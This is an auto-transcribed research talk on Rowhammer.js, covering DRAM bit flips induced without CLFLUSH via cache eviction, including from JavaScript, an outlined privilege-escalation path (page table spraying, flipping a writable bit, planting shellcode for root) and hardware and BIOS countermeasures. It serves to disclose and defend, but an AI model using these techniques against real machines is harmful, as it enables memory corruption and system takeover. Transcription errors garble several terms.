 and together with Daniel Kuss we're going to present to you our work of the past year on cash attacks and Rohammer. So a few words about ourselves. So I just finished my PhD a couple of months ago and I'm from Rennes in France. I'm from Germany originally, but I live in Austria for several years and I started my PhD one year ago. And I worked on cash attacks in this year and also on Rohammer when I just found that all my laptops were very vulnerable to Rohammering. Yeah, so a few words about the timeline. So this is a story about bit flips in DRAM. So it all started basically last year with key metal paper, which is called Flipping Bits in Memory Without Accessing Them at the ISCA conference. So this is the original Rohammer pack with the CL Flush instruction. It will mix in later. And it was originally viewed as a reliability issue. And the security community started to say it might not be such a good idea to flip bits without accessing them in a security perspective. But some people were like, it's just a few bit flips and we can't really control them. So what could possibly go wrong? So, yeah, actually a lot can go wrong. As I've shown Max Simon and Halvar Flecky who built not one but two exploits using Rohammer with CL Flush. So they built a sandbox escape and a route exploit. So shortly after that, so Daniel started working on Rohammer without CL Flush. And I joined him at Ugrad to work on it. And we got our first bit flips without CL Flush on Ivory Bridge and has well a few days later. This story about with CL Flush and without CL Flush. So the bitflips without CL Flush are actually the building block of our first bitflips from JavaScript that we got a few weeks later. Okay, so you will see what this is. This is a DRAM module, a DIM module. And let's see how it is organized internally. So for example, if you have two DIM modules, you can have two channels. It is composed of a backside and a front side which are called ranks. And on this ranks, you have eight chips. So inside these chips, you have again eight banks which are composed of rows and a row buffer. So this is a logical view. We are not really interested of how it's actually implemented. So we have our data, the bits in the cells in this rows. And we can access only rows per row. So when you want to access some data, the DRAM will issue an activate command on the row which will copy the data into the row buffer. And due to how the DRAM is designed, the cells are leaking. So we have to refresh to put the charge back so that we won't have any data loss. And these cells are actually leaking faster upon approximate accesses which leads to the Rohammer bug. So there's more advice who says something which I really like and analogies. So Rohammer is like breaking into an apartment by repeatedly slamming a Naples door until the vibration opened the door you were after. So let's see in the DRAM how it works. So you will issue an activate command on a special row that will copy into the row buffer. And you want to issue a lot of activate commands as fast as possible on this row. The issue is that if you just access this row, you will just go to the row buffer which acts like a cache. So you need to activate another row. And then this row again, another row. And then you have your pit flips. So this is really bad because we didn't touch this row at all and the bit changed. Now the thing is we can't just access data in DRAM just like that because between the CPU core and the DRAM, you have the CPU cache. So if you just access data all over and all over again, it will reach not the DRAM but the cache. And you won't have this bit flip. So you need only noncached accesses to reach the DRAM and all the original attacks use the CL flush instruction. So this instruction actually flushes a line from the cache so that next access will be served from the DRAM. Now a bit of background on this cache because it's really important from the remainder of the talk. So now in modern processors we have several cores, so let's say four cores. And we have a really higher key of different levels of cache. So here's three levels. Level one and level two are private to each core, which means that core zero can access only each level one and each level two, but not level one and level two of core three. And then we have this last-level cache, which is also divided in sort of slices. But these slices are shared across cores, so core zero can access a slice zero but also slice one, two, and three. And something that is also important in that this cache has the property of being inclusive, which means that all the data that is in level one and level two is also contained in this last-level cache. Okay. Let's now look at the Roy Hammer attack with the CL flush instruction. Now we have, additionally to the DRAM bank that we already had before, two cache sets. And there is a fixed mapping between DRAM cells and physical addresses and thereby cache sets. So, if we already have the data in the cache, we first have to call the flush instruction to throw it out of the cache, then it's gone, then we reload it, and then we reload the other address, then we flush it again, then we reload, then flush, then reload, then flush, then reload, then flush, then... Bit slip. Great. Okay, and before I continue with Roy Hammer, I want to talk about just one more attack. I talked about flush and reload just a few seconds ago, right? Flush and reload is a very powerful, very accurate cache attack, and you can do a lot of things with this attack. And it works exactly like what we just did, but instead of just hammering all the time, we measure whether an access was served from the cache, so it is a cache hit, or it was a cache miss and was served from DRAM, and apparently this takes a different time. And if you do this on a shared library, you can spy on other processes, because these shared libraries, they might have a method to work with the user input, and then you can see when the code from this shared library is loaded into the cache, and you didn't load it into the cache, so someone else did it. Okay, that was user input. And you can furthermore automate these attacks, so when you can simulate the event that you want to spy on, you can automate the attack fully and auto-generate attacks on cryptographic algorithms, auto-generate keyloggers, or partial keyloggers, and you can even perform cross-VM attacks if these VMs share memory. It's not a good idea to share memory. Okay. Yeah? So, what we would like to do is to do this attack, this ROHAMA attack, but without the CL first instruction. The global idea is that we would like to avoid the CL first instruction, because it's really dependent, so it's a specific instruction in X86, and you won't have it in other architecture, and it's also not available from JavaScript, so it would really extend the world of possibilities to do this without CL flush. So our approach is to use regular memory accesses to evict the cache, and the nice thing about this is that evicting the cache is really at the core of all cache attacks, and this is really what we know how to do best, so let's use it. So it works kind of the same. So we still have this gray line that we want to evict, and now what we're going to do is that we're going to access lots of addresses that will map to the same cache set until eventually it will evict the line we want. Now, something that is important here is that while we can choose in which cache set the accesses go, we cannot choose where in the cache set the accesses go. It depends on the replacement policies, so we just wait until we have evicted our lines. Then the next access will be served from the DRAM, which is exactly what we wanted. Then we have to do that over and over again, until we have our bit flip without the CL flush instruction. Now, it looks nice and easy like this, but there are actually some challenges. First, how do we get these physical addresses in JavaScript? It's a sandbox. Second, which physical addresses do we need to access? In which order do we need to access them? And then finally, how do we get these accurate timings in JavaScript? So clearly, they are not that simple. It's not trivial task. Okay, let's talk about the first problem, physical addresses and DRAM. So there is a fixed map from physical addresses to DRAM cells, but unfortunately it's not documented by Intel for several reasons. Mark Seaborn reverse engineered the mapping function for Sandy Bridge earlier this year, and we continued this reverse engineering just recently for Sandy Bridge, Ivy Bridge, Haswell, Skylake and in different configurations. What you might have noticed, the row buffer serves as a cache and accessing something that is served from the current row buffer takes a different time than from another row, and if you have a row conflict that takes much more time, and you can exploit this to build another attack. But let's stay with the physical addresses for now, and we now know the mapping from physical addresses to DRAM cells, but we don't know the mapping from physical addresses from JavaScript indices to physical addresses, right? So the operating system always wants to optimize everything, and one optimization is to use two megabyte pages, and two megabyte pages are more efficient because you need fewer TLB entries, and therefore you can have more entries in the TLB to translate virtual addresses. And if you use two megabyte pages, you see that the last 21 bits, so that's two megabytes, of the physical address and the virtual address, they are identical. And now the Mellok implementations say, okay, it's a good idea to allocate large chunks of memory, and the operating system says, okay, it's a good idea to use two megabyte pages there, and then we have the last 21 bits of the physical address in JavaScript, and that's probably a good idea. So further more, what we get from this is that we have several DRAM rows per two megabyte page, so we know we have several rows that we can just now hammer, and we have several congruent addresses in the cache, so that addresses that map to the same cache set, so we can also perform eviction here. And if we do not have enough congruent addresses, we can still use timing attacks for cross-page information and connect these two megabyte pages by that. You can also perform timing attacks to completely work without two megabyte pages and with four kilobyte pages instead, but that takes a lot more time. So the next question. Now, which physical addresses do we need to access? So I'm going to, well, this is what we call LRU eviction because it assumed that we were going to use this LRU replacement policy, and this is actually exactly what I showed you before. We are going to access N addresses from the same cache set to evict an N way set, and this is something that is also very known in the field of cache attacks, and so it is called Prime Plus Probe, and it's documented in this article if you want to read them. Now, we have this property of the last-level cache that is inclusive, and what it means is if we evict a line from the last-level cache, it will be evicted from the whole hierarchy to just guarantee this inclusive property. So we just need to evict line from the last-level cache. That sounds easy, right? Actually, not that much again. So we need to know very precisely where the addresses are mapped in the cache, and for that, for the last-level cache, we need to know first in which line an address is going to be mapped, and there is in Intel processors a hash function that maps physical addresses into slides, and it's undocumented by Intel. So, fortunately, just right before arriving in Grats, what I was tackling was reverse engineer this function, and I actually succeeded in reverse engineering it, and I was actually not alone. There were other teams working on it, so if you want to release the gory details on how we did this and what we achieved, you can also look at these papers. Now, fun fact, this hash function is basically an XOR of address bits, and yes, they call it a hash function. Okay. So, for the replacement policy, we just heard LRU replacement policy says the oldest entry is replaced first, so we need to have some kind of timestamp for every cache line, and now, when we access any address, it is maybe loaded into the cache, or maybe it is already there, and the timestamp is updated. And if we do this n times for an n-way cache set, then we have certainly evicted the target set, and we have also added the cache set, and we have also added the cache set that is now in the cache. And that is not true, because if you try to use LRU, it is much more efficient than we have certainly evicted the targeted address. Now, on more recent CPUs, that is not true anymore. They don't have LRU replacement policy, and that is not good, because if you try LRU eviction on such a CPU, it might look like this. So, yeah, it does something. You can understand it a bit more, but we only have a 75% success rate on Haswell if we perform LRU eviction, and, of course, we can perform more access, more than the cache set, than the size of the cache set, but this will be too slow. The success rate will be higher, so it would work for cache attacks, but it would not work for row hammering. Instead, we have to think about how to trick the cache into evicting the targeted address earlier, so tricking the cache in falling back to LRU eviction. And one strategy to do that is this pattern. So, you can see, first, we access address one, then we access address two, then we access address one again, then two, and then two and three, and two and three, and so on. And using this access pattern, we have a fast and effective eviction on Haswell CPUs, and also on Ivy Bridge, and it also works similarly on Skylake. And with this eviction strategy, we can achieve an eviction rate of more than 99.97%. And this is enough for row hammering. So, there's one remaining question, how to get accurate timing in JavaScript. And we need the accurate timing for two purposes. First, to interconnect these page information, if we do not have enough congruent addresses on a single page. And secondly, we have to decide whether an address is cached at some point. We have to decide whether eviction was successful or it was not successful. And in native code, this is fairly easy, because you can just use RDTSC and you get a sub-nanosecond accurate timestamp. In JavaScript, it's a bit more complicated, but window performance now is just perfect. It works if you have enough accesses. Then there was a recent patch to prevent cache attacks in JavaScript. You should also check out this paper. It's really cool. So, they can track mouse movements and stuff like that in JavaScript. And they patched this by rounding the time to five microseconds. And this helps against some cache attacks, but it does not help against row hammering, because we perform, like, millions of accesses, and there we consume more than five microseconds in time. We evaluated the bitflip rate on our Haswell test machine. And we, during this presentation, we varied the refresh interval in the BIOS. So, the default is very low and the 75-something is a maximum refresh interval we could set. And what you can see is that there is some point where the bitflips start to occur. And for CL flush and for native code eviction, it's approximately the same. We have a bit less bitflips in the CL flush variant. And in the JavaScript variant, it takes a bit higher refresh interval because JavaScript is apparently a bit slower than our optimized native code. So, this is a number of bitflips within 15 minutes. You can see that in the case of eviction or CL flush, and even for the higher refresh intervals for JavaScript, we have, like, more than 10,000 bitflips. That's more than 10 bitflips per second. Okay. Depending on your machine, it will work that well or it will not work that well. That's totally up to the hardware. That's in your system. So, let's now talk about exploits. How can we build exploits from these bitflips? And the first idea we had, yeah, we just poured the root exploit by Mark Seaborne to JavaScript. And actually, this might work. We haven't finished this work yet, but it might work. And the exploit by Mark Seaborne works by doing page table springs. So you fill the whole memory with page tables. And if you have a bitflip in a page table, that's bad because you can gain access to one of your own page tables by that. So this exploit needs shared memory because you map all the time the same page again, so you don't need any physical memory for your page, but only for the page tables. And we don't have shared memory in JavaScript. But fortunately, we observed earlier this year when working on another paper that zero pages are usually deduplicated. And this means we have some kind of shared memory because all zero pages will map to the same physical page. And then we have some kind of shared memory in JavaScript. That's bad. Okay. Physical memory access in native code. If we want to build the exploit, we just follow a few steps. The first is find an exploitable bitflip. So a bitflip that is in the right position and address bit probably. And then we release the page where we have the bitflip. Then we try to put a page table there by doing the page table, spraying, allocating a lot of shared pages. And then we try to trigger the bitflip again. And then we just check whether it was successful, whether we have a page table now mapped instead of the shared page. And then we can try to modify the page table and see where in our address space something is changed by that. Now, if we want to do the same exploit in JavaScript, we would use zero pages. And zero pages are read-only. So we have to only change two pieces here in the tag. The first is we also have to flip the writable bit. And that's much harder because the writable bit is in a specific position. And we only have one writable bit and not many address bits. And the other thing we change, yeah, we use zero pages instead of the shared pages. I tried this on my machines and it is possible to find such bitflips, but they are, of course, much rarer than other bitflips, regular bitflips, single bitflips. Okay. Code execution is root. If we want to have that from our full memory access, that's also again rather easy because we can just search for a known binary page and modify the page and add some shell code. And this page will probably not thrown out of the memory because we have a large file cache in our operating systems. And then we can just wait until the root user executes the shell code and do anything on the system. Okay. Now we have a nice attack. We have to find counter measures against it. Yeah. So the first thing that comes to mind is that we should avoid the bitflips right at the beginning. So it's a hardware issue. We should patch it in hardware. And actually, the vendors are currently doing this. So one solution is to do some sort of dynamic row refreshing. So the idea is to refresh the rows before a bitflips can occur. So sort of smart way of refreshing the rows. Now the issue is that it can only ship in new hardware. You cannot patch your own hardware right now. So we have a sort of huge issue of legacy hardware because the Rohammerbug, it basically affects all DRAM vendors. So it's really widespread. And we have this hardware that will stay for a few years. The second idea is to patch the BIOS. Again, it is already shipped. Here the idea is more simple. It's a sort of dumb way of doing this. We just increase the refresh rate. We refresh all rows more often, usually by doubling the refresh rate. Now the first issue is it might not be sufficient for all machines, as was suggested by the original paper. Now the second issue is a bit more pressing, is that we need a BIOS update. And like, who does that? Seriously. Okay. We had another idea because we want to make, we want to find something against the problem. And one idea that we had was while we were hammering all the time and had no bitflip that was exploitable, we thought, okay, life is not perfect. That's okay. What if we just say, we don't care about these self-destructive processes that have bitflips in their own memory. We just have to prevent that they have bitflips in memory that has a different privilege level or memory of other processes. We just have to prevent this. And if we can prevent this, then we can prevent any Rohammer exploits. And that's okay. Let's say Rohammering is okay as long as you cannot exploit it. So the idea is to have sort of physical memory pools. In physical memory, you separate pages that have different privileges and have gaps in physical memory that prevent that any bitflips occur in different privileged memory regions. Now, that sounds a bit awful, but if you think about it a bit, it could work if you group it into privileges and you only have to leave a small gap between these memory pools. So for the conclusions, cache eviction is fast enough to replace CLFlush. We have seen that. And without CLFlush, our attack is independent of programming languages and available instructions. So we could even perform it on ARM smartphones or something like that. It's the first hardware folder tag in JavaScript. It's also the first hardware folder tag that is performed through a remote website. And performing this attack through a website is actually a bit awful because if you say, okay, Rohammer, maybe 1% of systems is affected. Yeah, if I run a website and run this on 1 million users, that will still be an awful lot of people that are affected, right? So we are not there yet, but look out for the Rohammer.js JavaScript framework. Thank you. Thank you very much. We have about five minutes left for questions and the first two questions are on the Internet. Hi, Daniel. So pretty much all of RSC wants to know, what about ECC RAM? How is ECC RAM vulnerable? Yeah. That's a great question. Thank you for asking it. ECC RAM basically works like this. You have these eight chips and you have a ninth chip there. And this ninth chip also has rows. And if you access a row here, it has to get a check from here. And then you access this row here and then you access this row here for the check some, right? So you hammer on both sides at the same time. What then happens is unsure. There is ECC RAM that is more resistant to Rohammering, but there is apparently ECC RAM that is less stable against Rohammering and that's disturbing, right? And the second question from the Internet. Frankie wants to know, does it work the other way around? Like Node.js working on the server and attacking the server through inputs in the web page? I didn't get that. So Node.js is Java. Node.js. Yeah. What would you do with Node.js? Exploit the server. Yeah, probably that would work. If you can execute JavaScript code on the server, you could do the same on server side, yeah. Okay. The gentleman with microphone one. Hello. So the ECC RAM question would have been my first question, so good. I have a second one. The second question is a short enough refresh rate. Will this always prevent Rohammer or is this not enough as a fix? On my laptop, I just have here, I observed one bit flip where I had to perform 65,000 of these double hammering accesses. 65,000 accesses to DRAM, that's only a very short amount of time. I don't think you can solve this with the refresh rate, but for most laptops and desktop PCs, it will be sufficient. So here the answer was the range you can manipulate in the BIOS. My question was not the range of existing BIOS, the question was if we will always be able to produce a BIOS with such a timing which is enough to prevent Rohammer. You cannot configure it in all BIOSes, but if you can configure it, you can certainly set it low enough that you are resistant against Rohammer. Okay, next question, microphone two and after that microphone number three. So you just mentioned mobile devices. Have you ever tried it actually and how much mobile device affected? Yes, we tried it and we even put a smartphone for that in the refrigerator because that apparently changes the refresh interval. But to have the bit flips, you have to hammer the two rows, right? And right now we have not yet reverse engineered the mapping for the LPDDR3 on my smartphone, so we still have to do that. If I understood correctly, the hammering is more effective in flipping bits the faster it occurs. So did ASMJS support in browsers make the attack more effective? To my knowledge ASMJS does not provide you with native access to native code. It just provides you with efficient ways to implement something in JavaScript and you can basically do this by hand. There are tricks like X oring zero to something and then it will be a more efficient statement in the optimized code that is executed on the CPU. And we sort of did something like that to run our attack in JavaScript. But it's really simple to achieve this. You don't have to perform a lot of optimizations there because it's pointer dereferencing. What can you do wrong with that? Okay, thank you. Time is up. Thanks for the excellent timekeeping.